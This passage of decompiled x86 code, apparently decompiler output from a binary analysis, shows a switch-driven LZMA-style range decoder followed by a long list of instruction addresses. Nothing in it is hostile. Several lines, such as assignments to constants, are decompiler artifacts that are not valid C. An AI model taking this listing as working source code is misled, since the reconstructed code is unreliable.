													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                                                                                          0x00000000
                                                                                                                          0x004066f0
                                                                                                                          0x004066f0
                                                                                                                          0x004066f4
                                                                                                                          0x00406701
                                                                                                                          0x0040670b
                                                                                                                          0x00000000
                                                                                                                          0x004066f6
                                                                                                                          0x004066f6
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x0040673a
                                                                                                                          0x0040673a
                                                                                                                          0x0040673d
                                                                                                                          0x00406744
                                                                                                                          0x00406749
                                                                                                                          0x0040662a
                                                                                                                          0x0040662d
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x004069a2
                                                                                                                          0x004069a2
                                                                                                                          0x004069a2
                                                                                                                          0x004069a8
                                                                                                                          0x004069ae
                                                                                                                          0x004069b4
                                                                                                                          0x004069ce
                                                                                                                          0x004069d1
                                                                                                                          0x004069d7
                                                                                                                          0x004069e2
                                                                                                                          0x004069e4
                                                                                                                          0x004069b6
                                                                                                                          0x004069b6
                                                                                                                          0x004069c5
                                                                                                                          0x004069c9
                                                                                                                          0x004069c9
                                                                                                                          0x004069ee
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004069f0
                                                                                                                          0x004069f4
                                                                                                                          0x00406ba3
                                                                                                                          0x00406bb9
                                                                                                                          0x00406bc1
                                                                                                                          0x00406bc8
                                                                                                                          0x00406bca
                                                                                                                          0x00406bd1
                                                                                                                          0x00406bd5
                                                                                                                          0x00406bd5
                                                                                                                          0x00406a00
                                                                                                                          0x00406a07
                                                                                                                          0x00406a0f
                                                                                                                          0x00406a12
                                                                                                                          0x00406a15
                                                                                                                          0x00406a15
                                                                                                                          0x00406a1b
                                                                                                                          0x00406a1b
                                                                                                                          0x004061b7
                                                                                                                          0x004061b7
                                                                                                                          0x004061b7
                                                                                                                          0x004061c0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061c6
                                                                                                                          0x00000000
                                                                                                                          0x004061d1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061da
                                                                                                                          0x004061dd
                                                                                                                          0x004061e0
                                                                                                                          0x004061e4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061ea
                                                                                                                          0x004061ed
                                                                                                                          0x004061ef
                                                                                                                          0x004061f0
                                                                                                                          0x004061f3
                                                                                                                          0x004061f5
                                                                                                                          0x004061f6
                                                                                                                          0x004061f8
                                                                                                                          0x004061fb
                                                                                                                          0x00406200
                                                                                                                          0x00406205
                                                                                                                          0x0040620e
                                                                                                                          0x00406221
                                                                                                                          0x00406224
                                                                                                                          0x00406230
                                                                                                                          0x00406258
                                                                                                                          0x0040625a
                                                                                                                          0x00406268
                                                                                                                          0x00406268
                                                                                                                          0x0040626c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040625c
                                                                                                                          0x0040625c
                                                                                                                          0x0040625f
                                                                                                                          0x00406260
                                                                                                                          0x00406260
                                                                                                                          0x00000000
                                                                                                                          0x0040625c
                                                                                                                          0x00406236
                                                                                                                          0x0040623b
                                                                                                                          0x0040623b
                                                                                                                          0x00406244
                                                                                                                          0x0040624c
                                                                                                                          0x0040624f
                                                                                                                          0x00000000
                                                                                                                          0x00406255
                                                                                                                          0x00406255
                                                                                                                          0x00000000
                                                                                                                          0x00406255
                                                                                                                          0x00000000
                                                                                                                          0x00406272
                                                                                                                          0x00406272
                                                                                                                          0x00406276
                                                                                                                          0x00406b22
                                                                                                                          0x00000000
                                                                                                                          0x00406b22
                                                                                                                          0x0040627f
                                                                                                                          0x0040628f
                                                                                                                          0x00406292
                                                                                                                          0x00406295
                                                                                                                          0x00406295
                                                                                                                          0x00406295
                                                                                                                          0x00406298
                                                                                                                          0x0040629c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040629e
                                                                                                                          0x004062a4
                                                                                                                          0x004062ce
                                                                                                                          0x004062d4
                                                                                                                          0x004062db
                                                                                                                          0x00000000
                                                                                                                          0x004062db
                                                                                                                          0x004062aa
                                                                                                                          0x004062ad
                                                                                                                          0x004062b2
                                                                                                                          0x004062b2
                                                                                                                          0x004062bd
                                                                                                                          0x004062c5
                                                                                                                          0x004062c8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040630d
                                                                                                                          0x00406313
